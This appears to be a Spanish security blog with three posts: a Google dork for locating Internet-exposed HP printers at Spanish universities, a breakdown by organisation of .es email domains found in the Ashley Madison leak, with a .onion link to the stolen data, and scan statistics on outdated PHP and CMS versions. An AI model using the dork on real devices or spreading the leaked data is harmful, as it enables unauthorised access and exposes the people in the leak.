KN 33 0.000340421%
EE 31 0.00031979%
AD 30 0.000309474%
NI 27 0.000278527%
TD 27 0.000278527%
SI 26 0.000268211%
CV 25 0.000257895%
NE 25 0.000257895%
BN 24 0.000247579%
FM 22 0.000226948%
TZ 22 0.000226948%
CC 21 0.000216632%
GH 21 0.000216632%
RE 21 0.000216632%
GA 20 0.000206316%
GD 20 0.000206316%
DZ 19 0.000196%
IM 17 0.000175369%
RS 17 0.000175369%
UA 17 0.000175369%
TM 16 0.000165053%
AW 15 0.000154737%
AN 14 0.000144421%
MK 14 0.000144421%
SB 14 0.000144421%
BZ 13 0.000134105%
MQ 13 0.000134105%
YT 13 0.000134105%
TJ 12 0.00012379%
IQ 11 0.000113474%
FK 10 0.000103158%
NP 10 0.000103158%
PS 10 0.000103158%

jueves, 20 de agosto de 2015

Impresoras de universidades accesibles desde Internet

De todos es conocido que existen multitud de dispositivos conectados y accesibles desde Internet. El portal Shodan nos permite buscar este tipo de dispositivos.

Sin embargo no hace falta irse tan lejos y en el propio Google no es nada difícil buscar todo tipo de dispositivos. Así por ejemplo, introduciendo este dork:

inurl:es this.LCDispatcher

...Google nos va a mostrar las impresoras HP accesibles desde Internet. Ya de paso, se le ha pedido que en la URL aparezca "es", de España. Hace dos meses, cuando hice esta búsqueda aparecieron más de 20 impresoras. Tras informar a las diferentes universidades (solo una me dio las gracias, ;-P ), veo que aún se pueden encontrar 8 dispositivos conectados:

Lo más grave de todo es que es posible cambiar la configuración de la impresora, ver los logs de impresión e incluso enviar ficheros PDF para que sean impresos, con el correspondiente gasto de papel y tinta (excepto la última, que lo tienen protegido con contraseña).

Nótese el caso de la impresora de la universidad de Vigo, en la que algún desalmado les ha cambiado la configuración a un lenguaje bastante ininteligible (Noruego o algo así).

Aunque en el listado proporcionado por Google aparecia alguna impresora más, yo me centré en los que pertenecían a universidades españolas (que eran la mayoría).

Dentro de un par de meses habrá que volver a comprobar si queda alguna aún accesible o las han quemado los curiosos.


Cosas interesantes encontradas en el leak de Ashley Madison (I)

El pasado 19 de Agosto se publicaron los datos robados a Ashley Madison que incluía, entre otros, los nombres de usuario, las direcciones de correo electrónico y datos personales, como altura, peso, etc. También se incluye un fichero con fotos de perfil que aparentemente esta corrupto.

Los datos de este leak se pueden obtener descargándose un torrent de https://yuc3i3hat65rpl7t.onion.to/stuff/impact-team-ashley-release.html

Para quien no lo conozca Ashley madison es una página de citas para poner los cuernos a tu pareja. Pero no es una página cualquiera, es la más utilizada para este fin, con más de 30 millones de usuarios en todo el mundo.

En la página web HaveIBeenPwned.com podemos buscar las direcciones de correo de nuestros conocidos a ver si "han sido mal@s".

En Pastebin a las pocas horas empezaron a salir listados de correos. Entre ellos se filtró uno de los dominios ".es" encontrados. Hacen un total de 311538 direcciones de correo.

En los próximos días iré publicando extractos de este listado que me han parecido interesantes. Cada uno que saque sus conclusiones.


1.- Proveedores de correo más comunes

Como era de prever, los dominios más comunes fueron los de yahoo, gmail, hotmail, etc.

 161417 hotmail.es
  90977 yahoo.es
  22796 outlook.es
  11178 terra.es
   3982 gmx.es
   2130 wanadoo.es
   1757 gmail.es
   1020 ozu.es
    912 orangemail.es
    613 movistar.es

Sólo estos 10 suponen el 95% de esos 311500 correos encontrados. A mi personalmente me ha llamado la atención que gmail sea sólo el 7º proveedor de correo de este listado. Eso hace pensar que son gente "de la vieja escuela" que se crearon sus cuentas de correo hace al menos 10 años.



Lo siguiente que llama la atención es que no tenemos ni idea de inglés ni de escribir a máquina. Hasta 3736 direcciones de correo (un 1,2%) estaban mal escritas. Cuesta pensar en más combinaciones de errores... X-D

    522 hotmai.es
    281 homail.es
    168 hotmeil.es
    142 hotmal.es
    128 yaho.es
    119 outlok.es
    118 hotmil.es
     96 yahho.es
     93 hotamil.es
     91 outloo.es
     89 hormail.es
     82 htmail.es
     79 yaoo.es
     77 hoymail.es
     73 autlook.es
     65 hotmial.es
     56 otmail.es
     55 gemail.es
     54 outook.es
     54 outllok.es
     52 oulook.es
     50 holmail.es
     48 outloock.es
     42 hitmail.es
     40 hotamail.es
     39 yhoo.es
     39 uotlook.es
     39 gotmail.es
     38 hotail.es
     37 htomail.es
     36 outlock.es
     35 outlook.com.es
     35 otlook.es
     31 hotmsil.es
     31 hayoo.es
     30 hotmaill.es
     29 hptmail.es
     27 jotmail.es
     27 ahoo.es
     26 yahooo.es
     25 homtail.es
     24 yohoo.es
     23 hotnail.es
     21 utlook.es
     20 yhaoo.es
     19 yahhoo.es
     18 jahoo.es
     17 yayoo.es
     17 yajoo.es
     17 hotmali.es
     16 tahoo.es
     16 holtmail.es
     16 hoitmail.es
     15 hotmaul.es
     14 outloook.es
     14 hotmaol.es
     13 wanado.es
     13 outoolk.es
     13 outlokk.es
     13 houtlook.es
     13 hotmaiil.es
     13 hotmaail.es
     13 hootmail.es
     13 hoail.es
     13 hhotmail.es
     12 ouylook.es
     12 hottmail.es
     12 hotmailo.es
     12 hotmail.es.es
     11 outlool.es
     11 hotrmail.es
     11 hotmael.es
     11 hot.es
     11 hmail.es
     10 hotmmail.es
      9 gmeil.es
      8 qutlook.es
      8 hatmail.es
      8 gmil.es
      8 gamil.es

...y hay muchos mas.


2.- Entidades públicas

El siguiente paso fue comenzar a buscar políticos, ministerios, ayuntamientos y demás. Al 98% revisado (es imposible comprobar los 5500 dominios diferentes) encontramos:

 143 andaluciajunta.es
 34 juntadeandalucia.es
 34 jerez.es
 29 gva.es
 23 pp.es
 23 et.mde.es
 14 edu.xunta.es
 14 cgac.es
 12 carm.es
 11 fn.mde.es
 10 sescam.jccm.es
 8 sevilla.es
 8 oc.mde.es
 7 terrra.es
 7 murcia.es
 7 ea.mde.es
 6 xunta.es
 6 munimadrid.es
 6 guardiacivil.es
 6 cv.gva.es
 6 badajoz.es
 6 aragon.es
 5 madrid.es
 5 justicia.es
 5 fomento.es
 5 castillalamancha.es
 4 valencia.es
 4 salud.aragon.es
 4 jccm.es
 3  diputada.congreso.es
 2  diputada.congreso.es

3.- Universidades

Universidades (como os aburris):

 54 alumni.uv.es
 39 alu.ua.es
 38 usal.es
 29 correo.ugr.es
 26 um.es
 26 uco.es
 24 us.es
 23 uji.es
 20 unizar.es
 18 uv.es
 17 ugr.es
 17 alumni.unav.es
 16 ucm.es
 13 alum.us.es
 13 alumnos.unex.es
 12 opendeusto.es
 12 udc.es
 11 upv.es
 11 estudiantes.unileon.es
 10 unex.es
 10 ehu.es
 10 alumnos.uc3m.es
 9 alumno.uned.es
 9 alumnos.upm.es
 8 uniovi.es
 8 uca.es
 8 alumnos.unican.es
 8 alumnos.uchceu.es
 8 alumnes.udl.es
 7 ull.es
 7 uam.es
 6 unileon.es
 6 uah.es
 6 ua.es
 6 estumail.ucm.es
 6 cam.upv.es
 5 rai.usc.es
 5 estudiante.uam.es
 5 postal.uv.es
 5 mail.ucv.es
 4 uvigo.es
 4 urjc.es
 4 ual.es

4.- Empresas del IBEX

Empresas del IBEX:

 27 iberia.es
 19 endesa.es
 16 renfe.es
 15 adif.es
 8 indra.es
 7 aena.es
 6 ohl.es
 6 banesto.es
 5 cajamar.es
 5 bankinter.es
 4 gruposantander.es
 4 lacaixa.es

En Pastebin han aparecido multitud de listados

viernes, 3 de julio de 2015

Miles de servicios web en dominios .es desactualizados

...Siguiendo con el post anterior...


Tecnologías web

No todos los servidores responden sobre las tecnologías web que albergan (ASP, PHP, etc). De los 1.414.996, solo 589.092 respondieron y de ellos:

  • PHP: 339.831
  • ASP.NET: 137337
  • Plesk: 53641
  • Otros: 19941

ASP no aporta información de sus versiones, por lo que no podemos conocer nada de su antigüedad. Sobre PHP Whatweb nos reporta bastante información, entre ella, las versiones de PHP instaladas.

Acumulando, encontramos que las versiones más comunes de PHP en los dominios ".es" son:

  • PHP 5.3.3: 66135
  • PHP 5.2.17: 42467
  • PHP 5.4.38: 42467
  • PHP 5.3.29: 23320
  • PHP 5.3.2: 25311
  • PHP 5.4.39: 21016
  • PHP 5.5.23: 11879
  • PHP 5.5.22: 8787

La fecha que vemos encima de cada versión es la fecha en que dejaron de tener soporte según http://php.net/releases/. De hecho si calculamos esto a lo largo de los 216000 version que conocemos, encontramos el siguiente gráfico:

Como vemos el 14 de Agosto de 2014 se dejó de dar soporte a 5.3.29 y con esta version, un total de 217000 dominios .es se encontraron sin soporte PHP. En la actualidad, únicamente las versiones 5.4, 5.5 y 5.6 tienen soporte activo.

Si acumulamos por familias:

  • PHP 5.5: 30411
  • PHP 5.4: 86325
  • PHP 5.3: 144505
  • PHP 5.2: 62073
  • PHP 5.1: 3938
  • PHP 5.0: 1407
  • PHP 4.4: 5301
  • PHP 4.3: 438
  • Anteriores a 4.3: 30
  • Otros: 39

CMS

En cuanto a los CMS, solo 192408 respondieron algún tipo de información. Entre ellos:

  • Wordpress: 76.164
  • Joomla!: 30894
  • 1and1: 15051
  • Prestashop: 11772
  • Drupal: 5446
  • Frontpage: 3025
  • TYPO3: 2818
  • Blogger: 2793
  • iWeb: 2527
  • Parallels Plesk: 2126
  • Otros: 40285

Ahora bien, lo mas interesante vino al descubrir las versiones de los servidores web, CMS. Algunos de ellos no daban información relevante (como debe ser), por ejemplo los de 1and1, los Drupal (el 99,99% devuelven "Drupal 7") o los Prestashop. Pero los Joomla! y sobre todo los Wordpress, son una mina.


Joomla!

De Joomla! se obtuvo información de 30984 CMS. De ellos 21847 no aportaban información relevante sobre la versión instalada. Pero otros 9137 nos dijeron:

  • Sin informacion relevante: 21847
  • Joomla! 1.5 : 7964
  • Joomla! 1.6 : 299
  • Joomla! 1.7 : 717
  • Joomla! 2.5 : 92
  • Joomla! 3 (en sus diferentes versiones): 65

El script no aporta información de las subversiones de Joomla! (Tal vez es una posible linea de estudio futuro), por lo que nos tenemos que conformar con las familias.

En cualquier caso, hay que recordar que Joomla! 1.5 se lanzó en Enero de 2008 y se le dejó de dar soporte en Diciembre de 2012. De hecho a las versiones 1.6 y 1.7 también se les dejó de dar soporte en 2012 y la única actualmente con soporte oficial son las versiones 3.3 y 3.4 de las cuales apenas hay 27 encontrados en este escaneo (0% indica la gráfica).

La razón de este numero tan bajo probablemente sea porque los Joomla! 3 sean los que no devuelven información, pero no puedo afirmar ni desmentir tal cosa.


Wordpress

Vaya por delante que no tengo ni idea de Wordpress por lo que puede que a lo largo de las siguientes linea realice alguna afirmación que no tenga ni pies ni cabeza. Una vez dicho esto, entre los datos que aporto el estudio también estaban las versiones instaladas de Wordpress. Las versiones más utilizadas (en el momento del estudio) fueron:

  • 4.1.1 : 14182
  • 4.1.3: 6560
  • 4.0.1: 5689
  • 4.1.2: 5648
  • 3.5.1: 3568
  • 3.9.3: 3080
  • 4.0.3: 2759
  • 3.8.5: 2186
  • 3.9.5: 2050

Hay que decir que las versiones de Wordpress encontradas estan bastante actualizadas. En https://wordpress.org/news/category/releases/ encontramos las fechas de publicación. De estas 9 versiones más implantadas. Solo una La version 3.5.1 tendría más de un año de antigüedad. En concreto fué lanzada el 24 de Enero de 2013.

En https://wpvulndb.com/wordpresses tenemos un listado de vulnerabilidades en las distintas versiones de Wordpress. Así, por ejemplo vemos que entre las 3 primeras, la 4.1.1 tiene reportadas 3 vulnerabilidades, la 4.0.1, dos vulnerabilidad reportadas, la 4.1.2 una, mientras que la version 3.5.1, la que tiene mas de un año de antiguedad, se han reportado 17 vulnerabilidades...

Pero este gráfico muestra un universo de 45.000. En los Los 30.000 restantes encontramos gran cantidad de versiones antiguas. Agrupando por familias vemos que sigue habiendo mucho Wordpress 3 y algún que otro Wordpress 2:

  • Wordpress 3: 31000
  • Wordpress 4: 42381
  • Wordpress 2: 692
  • Sin informacion: 2137

De hecho acumulando versiones vemos que el 81% de los wordpress tienen una antiguedad (de fecha de salida) de menos de 2 años, pero un 16% (un total de 12376 implantaciones) cuenta aún con una version de Wordpress de más de 2 años de antigüedad que, a buen seguro, tendrá un gran numero de vulnerabilidades.


Plugins de wordpress

Pero no solo tenemos información de las versiones de Wordpress. Si nos fijamos en la información devuelta de por Whatweb, encontramos que nos informa de alguna plugins instalados (me imagino que no todos). En total más de 400 plugins diferentes instalados en 17378 Wordpress que aportaron este tipo de información. Todos ellos con sus respectivas versiones... Los plugins más instalados fueron:

  • Visual Composer: 6903
  • WooCommerce: 5296
  • WPML: 4269
  • Divi: 1325

En wpvulndb tambien se reportan vulnerabilidades en los plugins de Wordpress. Mismamente WooCommerce tiene reportadas 8 vulnerabilidades y WPML tiene una vulnerabilidad recientemente reportada.


Resumen

Un escaneo de este tipo aporta mucha información muy interesant